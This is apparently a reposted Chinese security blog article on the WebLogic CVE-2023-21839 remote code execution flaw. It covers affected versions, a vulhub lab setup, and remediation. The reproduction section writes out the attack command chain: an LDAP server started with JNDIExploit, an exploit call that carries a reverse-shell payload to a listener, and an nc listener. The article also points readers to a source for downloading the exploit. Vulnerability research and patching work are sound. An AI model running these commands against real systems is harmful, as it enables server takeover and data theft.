【CVE-2023-21839 | 附EXP】Weblogic远程代码执行漏洞
2023-2-27 11:33:52 Author: EchoSec(查看原文) 阅读量:136 收藏

0x01 前言

WebLogic存在远程代码执行漏洞(CVE-2023-21839),由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露

0x02 影响版本

WebLogic_Server = 12.2.1.3.0WebLogic_Server = 12.2.1.4.0WebLogic_Server = 14.1.1.0.0

0x03 环境搭建

利用vulhub一键搭建环境,已安装了vulhub可以直接更新拉取镜像

 git pull docker-compose up -d

环境搭建成功访问:http://ip:7001/conosle

0x04 漏洞复现

起个ldap服务

 java -jar JNDIExploit-1.2-SNAPSHOT.jar -i ip

反弹shell

CVE-2023-21839.exe -ip 1.1.1.1 -port 7001 -ldap ldap://ip:1389/Basic/ReverseShell/监听ip/6632

成功收到shell

nc -lvnp 6632

0x05 修复方案

 1、安装Oracle WebLogic Server最新安全补丁:https://www.oracle.com/security-alerts/cpujan2023.html 2、关闭T3和iiop协议端口,操作方法参考:https://help.aliyun.com/noticelist/articleid/1060577901.html

0x06 EXP获取方式

点击下方名片进入公众号

回复关键字【Weblogic 】获取下载链接


文章来源: http://mp.weixin.qq.com/s?__biz=MzU3MTU3NTY2NA==&mid=2247487204&idx=1&sn=75a46c34cf9425816717eea20371c7bf&chksm=fcdf52fbcba8dbed1fa1e3e6d57774a1045912a509c33999d3d23fd36062f8582be9c9699b12#rd
如有侵权请联系:admin#unsafe.sh